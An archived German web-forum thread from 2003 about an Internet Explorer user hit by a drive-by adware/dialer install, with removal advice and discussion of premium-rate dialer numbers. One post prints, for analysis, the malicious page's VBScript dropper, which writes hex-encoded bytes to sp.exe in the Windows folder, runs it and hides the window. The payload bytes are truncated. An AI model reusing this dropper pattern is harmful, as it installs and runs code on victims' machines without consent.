SELFHTML Forum
SELFHTML Forumsarchiv
2003
Dezember
 |
SELFHTML Forumsarchiv |
 |
|
 |
|
Die folgende Nachricht zum Thema stammt von: stvx, 31. 12. 2003, 19:43
tach forum,
So ein Mist aber auch. Habe ich gerade im IE gesurft (eigene Dummheit, muss ich sagen), und mir hier: http:// www.ntsearch.com/de_in.php?acc=zon anscheinend irgendwas eingebrockt. Diese Werbe-Seite hat auf jeden Fall ihr _dummes_ Tool installiert, obwohl ich ausdrücklich auf "nein" geklickt habe - und - na super..... W I E hat es denn das hinbekommen ?
Auf jeden Fall ist meine Frage: Wie bekomme ich das Scheißteil wieder weg ? thx,
euer stvx
Die folgende Nachricht zum Thema stammt von: Sven Rautenberg, 31. 12. 2003, 19:48
Moin!
»» So ein Mist aber auch. Habe ich gerade im IE gesurft (eigene Dummheit, muss ich sagen), und mir hier: http:// www.ntsearch.com/de_in.php?acc=zon anscheinend irgendwas eingebrockt. Diese Werbe-Seite hat auf jeden Fall ihr _dummes_ Tool installiert, obwohl ich ausdrücklich auf "nein" geklickt habe - und - na super..... W I E hat es denn das hinbekommen ?
Ich habe dein Posting mal entschärft. Es sollte zum guten Ton gehören, dass man hier im Forum KEINE Links auf potentiell schädliche Seiten setzt. Die URL angeben kann man meinetwegen, aber eben nicht als funktionierender Link. Denn der Müll kommt ins Archiv, und dort wird er von Google gefunden, und dann kommen noch mehr Leute da hin, wo du nicht hinwolltest.
Was da passiert: Nach diversen Weiterleitungen will mein Browser (es ist nicht der IE ;), sondern der Opera) eine EXE runterladen. Klar, wenn ich in Opera einen Download abbreche, dann ist tatsächlich Schluß, und nichts passiert.
»» Auf jeden Fall ist meine Frage: Wie bekomme ich das Scheißteil wieder weg ? thx,
Es gibt diverse Dialer- und Adware-Bustersoftware, die nach allen bekannten Programmen sucht und die Komponenten entfernt. Stichwort "Ad-aware" oder "Search and Destroy" in Google sollten helfen.
Und ansonsten lade dir am besten mal einen vernünftigen Browser runter, mit dem sowas nicht passiert. Der IE ist im Internet eigentlich Selbstmord - und du bist scheinbar kurz davor.
- Sven Rautenberg
--
Die SelfHTML-Developer sagen Dankeschön für aktuell 20885,68 Euro Spendengelder!
Die folgende Nachricht zum Thema stammt von: habemeinennamenvergessen, 31. 12. 2003, 19:58
Hallo Sven,
»» Und ansonsten lade dir am besten mal einen vernünftigen Browser runter, mit dem sowas nicht passiert. Der IE ist im Internet eigentlich Selbstmord - und du bist scheinbar kurz davor.
Ich habe Opera 7 - und das ist spitze :-)
habemeinennamenvergessen
Die folgende Nachricht zum Thema stammt von: fastix®, 31. 12. 2003, 22:29
Moin!
http://www.ntsearch.com/popengine/popup.php
Da ist der Schädling.
Ein VBS- Script, welches die so.exe schreibt.
Ich hab das Skript mal zusammengekürzt:
<HTML>
<SCRIPT language=vbs>
self.MoveTo 1500, 1500
prog = prog & "4d,5a,90,00,03,00,00,00,04,00,00,00,ff,ff,00,00,b8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,"
...
prog = prog & "00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"
tmp = Split(prog, ",")
Set fso = CreateObject("Scripting.FileSystemObject")
Set shell = CreateObject("WScript.Shell")
folder = fso.GetSpecialFolder(0)
path = folder & "\\sp.exe"
Set f = fso.CreateTextFile(path, True)
For i = 0 To UBound(tmp)
l = Len(tmp(i))
prog = Int("&H" & Left(tmp(i), 2))
If l > 2 Then
r = Int("&H" & Mid(tmp(i), 3, l))
For j = 1 To r
f.Write Chr(prog)
Next
Else
f.Write Chr(prog)
End If
Next
f.Close
shell.Run(path)
self.Close
</SCRIPT>
</HTML>
Dieses Skript ist schlicht als kriminell zu bewerten. Es schreibt eine executable (sp.exe) und startet diese. Das die "freundlichen" Verschleuederer des Virus sich Ihrer kriminellen Tätigkeit bwust sind bweist deren Versteckspiel: self.MoveTo 1500, 1500 soll das Browserfenster verschieben und kann das wohl auch. - Arme IE- Benutzer!
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Als Freiberufler bin ich immer auf der Suche nach Aufträgen: Schulungen, Development. Auch für seriöse Agenturen.
Die folgende Nachricht zum Thema stammt von: scheint wohl eine IE sicherheitslücke zu sein ..., 01. 01. 2004, 21:00
Tach auch,
»» Set fso = CreateObject("Scripting.FileSystemObject")
»» Set shell = CreateObject("WScript.Shell")
Sofern ich weiß, nutzt das WSH - Windows Script Host - ActiveX-Objekte, und bei denen Fragt der Browser immer erst nach, befor einen Script damit hantieren lässt. Wieso macht er das bei dieser Seite nicht ???
Die folgende Nachricht zum Thema stammt von: fastix®, 02. 01. 2004, 15:11
Moin!
»» Sofern ich weiß, nutzt das WSH - Windows Script Host - ActiveX-Objekte, und bei denen Fragt der Browser immer erst nach, befor einen Script damit hantieren lässt. Wieso macht er das bei dieser Seite nicht ???
Keine Ahnung, ob gefragt wird oder nicht. Ich werd mir das Skript nicht im IE antun. Zum Webbrowsen benutze ich selbigen Scheißdreck schon lange nicht mehr. Wozu auch? Mircosoft soll das Ding wegschmeissen und lange nachdenken, was da geliefert wird und ob es sinnvoll ist an diesen "Sicherheitskonzepten" festzuhalten.
Eigentlich müssten die jedem Windowskäufer ein kostenloses Linux als Garantieleistung zu Hause vorbeibringen :)
Das Office können sie ja portieren- aber bitte ohne IE.
MFFG (Mit freundlich- friedfertigem Grinsen)
fastix®
--
Als Freiberufler bin ich immer auf der Suche nach Aufträgen: Schulungen, Development. Auch für seriöse Agenturen.
Die folgende Nachricht zum Thema stammt von: Jeena Paradies, 31. 12. 2003, 19:50
Hallo,
Warscheinlich hilft das
http://board.protecus.de/showtopic.php?threadid=7408
Grüße
Jeena Paradies
--
Alkoholverbot in der gesammten Bamberger Innenstadt!
http://www.jeenaparadies.de/alkoholverbot/
Die folgende Nachricht zum Thema stammt von: stvx, 31. 12. 2003, 20:06
Hallo Jeena,
vielen, vielen dank für deinen Link, mein selbstmordbrowser ([pref:t=67895&m=388820]) ist nun endlich wieder von der Seuche befreit :-)
Nun, aber was war das jetzt für ein Teil, was dieser schlimme Link ([pref:t=67895&m=388820]) gemacht hat ? Sicherheitsloch im IE ? Trojaner, Virus, ...? Nur zu meiner Information :-)
stvx (dummer name, aber ich laufe irgenwie namenlos hierherum)
Die folgende Nachricht zum Thema stammt von: Ingo Turski, 31. 12. 2003, 20:16
Hi,
»» Nun, aber was war das jetzt für ein Teil, was dieser schlimme Link ([pref:t=67895&m=388820]) gemacht hat ? Sicherheitsloch im IE ? Trojaner, Virus, ...? Nur zu meiner Information :-)
also auf dieser (leer aussehenden) Seite sehe ich mit meinem IE (natürlich mit deaktiviertem ActiveScripting;-) einen sich selbst aufrufenden Link (vermutlich sogar Popup-Blocker resistent) auf http://connect.online-dialer.com/... Ich würde mal die nächste Telefonrechnung genauer unter die Lupe nehmen.
Auf dieser Seite ist auch ein Hinweis: "REPORT A SPAMER or ILLEGAL USAGE e-mail aups@online-dialer.com", den ich vielleicht nutzen würde.
freundliche Grüße
Ingo
Die folgende Nachricht zum Thema stammt von: Andreas-Lindig, 01. 01. 2004, 13:43
Hallo alle,
»» Ich würde mal die nächste Telefonrechnung genauer unter die Lupe nehmen...
ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?
Gruß, Andreas
und schönes Neujahrswochenende
--
http://was-ist-das.andreas-lindig.de
Die folgende Nachricht zum Thema stammt von: TorstenA, 01. 01. 2004, 14:06
Hallo Andreas,
»» ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?
Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.
Grüße
Torsten
--
http://www.siechfreds-welt.de/impnaz.shtml
Die folgende Nachricht zum Thema stammt von: Henning Bösch, 01. 01. 2004, 14:32
Hallo,
»» Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.
http://www.heise.de/newsticker/data/uma-13.12.03-002/
Gruß,
Henning
--
Gruß aus Braunschweig
SELF-Code: sh:( fo:| ch:{ rl:( br:> n4:( ie:( mo:) va:) de:] zu:} fl:( ss:| ls:<
http://emmanuel.dammerer.at/selfcode.html
http://www.peter.in-berlin.de/projekte/selfcode/?code=sh%3A%28+fo%3A%7C+ch%3A%7B+rl%3A%28+br%3A%3E+n4%3A%28+ie%3A%28+mo%3A%29+va%3A%29+de%3A%5D+zu%3A%7D+fl%3A%28+ss%3A%7C+ls%3A%3C+js%3A%7C
Die folgende Nachricht zum Thema stammt von: TomIRL, 01. 01. 2004, 14:34
Moin
»» Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.
Seit Anfang Dez ist es vorgeschrieben, dass Dialer ausschliesslich 0900 -9 Vorwahlen verwendet werden dürfen.
Damit ist man mit 0190 nicht mehr auf der sicheren Seite.
http://www.heise.de/newsticker/data/uma-13.12.03-002/
Viele Grüße TomIRL
Die folgende Nachricht zum Thema stammt von: Detlef G., 01. 01. 2004, 14:48
Hallo Torsten,
hallo Andreas,
»» »» ich hätte zu diesem Thema Dialer mal gern ne Frage: Nutzen die nur 0190er Nummern oder auch andere? Ich habe bei mir alle 0190er Nummern sperren lassen. Ist das "sicher"?
»»
»» Es gibt auch andere "Mehrwertdienste", z.B. die 0900er Vorwahl. Ob die allerdings zur Einwahl ins Netz genutzt werden kann, kann dir nur die http://www.telekom.de sagen.
Seit dem 14. Dezember darf für Dailer nur noch die Rufnummerngasse 09009 verwendet werden.
Das hindert natürlich unseriöse Dailerbetreiber nicht, andere teure Nummern zu verwenden.
Weiter Informationen und Nachrichten findet ihr unter http://www.dialerschutz.de/.
MFG
Detlef
--
- Wissen ist gut
- Können ist besser
- aber das Beste und Interessanteste ist der Weg dahin!
© 1998-2006 
Impressum, Software: Classic Forum
(BROWSER)